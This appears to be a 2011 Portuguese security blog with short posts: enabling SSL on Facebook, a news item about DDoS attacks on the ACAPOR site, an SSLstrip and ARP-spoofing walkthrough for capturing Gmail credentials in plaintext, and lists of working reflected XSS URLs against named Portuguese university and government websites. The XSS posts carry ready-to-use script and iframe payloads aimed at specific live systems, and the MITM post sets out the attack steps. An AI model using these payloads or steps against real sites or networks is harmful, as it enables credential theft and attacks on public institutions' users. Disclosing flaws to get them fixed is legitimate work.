Activar SSL no Facebook

•Abril 10, 2011 • 1 Comentário

 

Para quem não sabe o Facebook já suporta SSL, para activarem basta seguir os seguintes passos:

-> Depois de entrarem no facebook com a vossa conta, clicar em “Conta” > Definições de Conta > Segurança da Conta (alterar) > Colocar o visto em “Navegar no Facebook numa ligação segura (https) sempre que possível”

Agora já têm uma ligação por SSL no facebook.

Anúncios

Instituto Politécnico de Lisboa promete colaborar no sentido de evitar novos ataques ao site da ACAPOR

•Fevereiro 20, 2011 • Deixe um Comentário

Eu não criei este blog com o objectivo de postar notícias mas de facto não pude ficar indiferente a esta notícia da ACAPOR:

Acapor

Como estava previsto a ACAPOR reuniu-se com o Presidente do IPL para mostrar a sua preocupação sobre os ataques que estiveram a ser efectuados através de um, ou vários, utilizadores da rede de internet do IPL ao sítio da internet da nossa associação. O senhor Presidente do IPL demonstrou disponibilidade para colaborar.

Na reunião marcaram presença, além do senhor Presidente, mais 5 elementos do departamento informático do IPL convocados para o efeito pelo senhor Presidente.

Apesar das conclusões positivas da referida reunião, a ACAPOR não deixa de lamentar o tom crispado da recepção à ACAPOR por alguns dos elementos presentes na reunião (que não o senhor Presidente que mostrou sempre um comportamento institucional irrepreensível) agastados com o facto da ACAPOR ter tornado pública a identificação da rede do IPL numa actividade ilícita e criminosa.

Ora, entendemos nós, é importante que os cidadãos saibam que existem redes de internet propícias para a execução de crimes ao abrigo do anonimato oferecido pela mesma, ainda que os responsáveis por essa rede em nada concorram para tal. A rede do IPL, tal como nos indicaram, é utilizada por cerca de 18 mil pessoas e a sua posterior identificação em alguma actividade ilegal não parece ser fácil. Ou existe uma denúncia na hora ou, depois, as diligências de identificação complicam-se substancialmente. Isto, parece-nos, é grave no sentido em que Instituições de elevado prestígio, como é o caso do IPL, podem ficar com a sua imagem irremediavelmente afectada se, algum dia, alguém mal intencionado (basta 1 elemento num universo de 18 000) cometer um crime ainda mais grave do que aquele que ocorreu e ficar impune justamente pelo descontrolo da rede.

Assim, esperamos que as más energias acumuladas para “matar o mensageiro” sejam agora canalizadas para que o IPL consiga ter no futuro forma de se proteger e de expurgar definitivamente a sua responsabilidade de situações como a ocorrida ou, eventualmente, de outras mais gravosas que possam vir a acontecer, independentemente do momento em que surjam as denúncias ou que seja detectada a ilegalidade praticada.

A ACAPOR quer ainda salientar e sublinhar que, contrariamente à interpretação de alguns, nunca colocou em causa o IPL enquanto Instituição e que nunca por nunca pôs sequer a hipótese que o ataque tenha sido idealizado ou organizado por qualquer responsável pelo IPL.

Fonte: ACAPOR

Parece que o site da ACAPOR voltou a ser atacado, para quem não sabe eles já tinham sofrido um deface no ano passado por parte dos fãs do “The Pirate Bay”, como se pode constatar no zone-h. Nas últimas semanas, depois de terem anunciado que todos os meses iam denúnciar cerca de 1000 endereços ip o site foi alvo de vários ataques (principalmente DDoS) ficando assim offline.

Então vamos lá pensar um bocadinho, se os ataques vieram da rede do IPL, o mais provável é os ataques terem sido feitos a partir do ISEL que é a única instituição pertencente ao IPL que é capaz de ter pessoas com conhecimentos para tal, sinceramente não estou a ver pessoal da ESEL ou do ISCAL a fazer ataques informáticos.

Eu não conheço o parque informático do IPL ou do ISEL, mas será assim tão difícil saber quem esteve em determinado computador a fazer tal coisa a tal hora? Sinceramente não me parece. Será o parque informático do IPL ou do ISEL mal gerido ou estão apenas a “abafar” o caso?

Fica a pergunta no ar.

Ataque Man in the Middle no Gmail – SSLstrip

•Fevereiro 4, 2011 • 2 comentários

Para quem pensa que o SSL é 100% seguro, desengane-se, já existem algumas maneiras de contornar a encriptação do protocolo SSL e é exactamente isso que pretendo mostrar-vos neste post.

Aplicações utilizadas:

  • sslstrip;
  • arpspoof;
  • iptables.

1º – Começamos por colocar o IP Forwarding a funcionar, depois iniciamos o ARP Spoofing, como mostra a figura:

2º – Nesta imagem vemos o ARP Spoofing a ser feito:

3º – Agora vamos reencaminhar todo o tráfego da porta 80 da vítima para a nossa porta 10000:

4º – Agora vamos iniciar o SSLstrip para captar os pacotes da vítima:

5º – A vítima faz o login e se repararem o SSL está desactivo, ou seja quando colocamos o SSLstrip a funcionar, ele “desabilita” o SSL na vítima quase sem se dar por isso:

6º – Entretanto o login foi feito, como podem ver na imagem:

7º – Agora vamos ver os pacotes que o SSLstrip capturou:

Como podem ver, username e password em plain text.

Esta técnica foi revelada por Marlinspike na DefCon em 2009 (se não estou em erro) e por incrível que pareça ainda existem grandes sites vulneráveis como o Google ou o Paypal. Para quem quiser saber mais detalhes sobre a vulnerabilidade, leia isto.

P.S: Os meus agradecimentos ao thn pela ajuda nas imagens.

XSS em sites de faculdades

•Fevereiro 1, 2011 • 8 comentários

 

Infelizmente parece que a incompetência também existe em determinadas instituições do ensino superior.

Vou deixar mais alguns sites vulneráveis a XSS:

http://www.uevora.pt/pesquisa/resultado?query=%3E%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fseczero.wordpress.com%22%%20%203E

https://www.ubi.pt/Pesquisar.aspx?pesquisar=%3E%22%3E%3C%22%3E%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://darkstar.ist.utl.pt/openbsd/4.8/i386/install48.iso%22%3E%3C/iframe%3E

https://www1.esec.pt/pesquisa.php?palavra=%3Cscript%3Ealert(/seczero/)%3C/script%3E

P.S: Talvez o site da ESEC não mereça estar neste post, visto que não é uma faculdade virada para as tecnologias mas de qualquer das maneiras decidi juntar à lista para os alertar.

XSS nos sites governamentais

•Janeiro 31, 2011 • 1 Comentário

 

Parece que a (in)segurança nos sites do governo português continua.

Vou deixar alguns exemplos:

http://www.ire.gov.pt/irenews/index.php?id=7%22%3E%3Cscript%3Ealert(/seczero/)%3C/script%3E

http://dgarq.gov.pt/?s=%3E%22%3E%3Ciframe%20src=%22https://seczero.wordpress.com%22%3E

http://antt.dgarq.gov.pt/?s=%3E%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fseczero.wordpress.com%22%3E

http://www.e-financas.gov.pt/de/jsp-dgaiec/main.jsp?body=/home/pesquisa.jsp

POST: query=”><script>alert(“seczero”)</script>

Quando é que vão começar a dar valor à segurança informática? Quando é que vão começar a contratar profissionais de qualidade?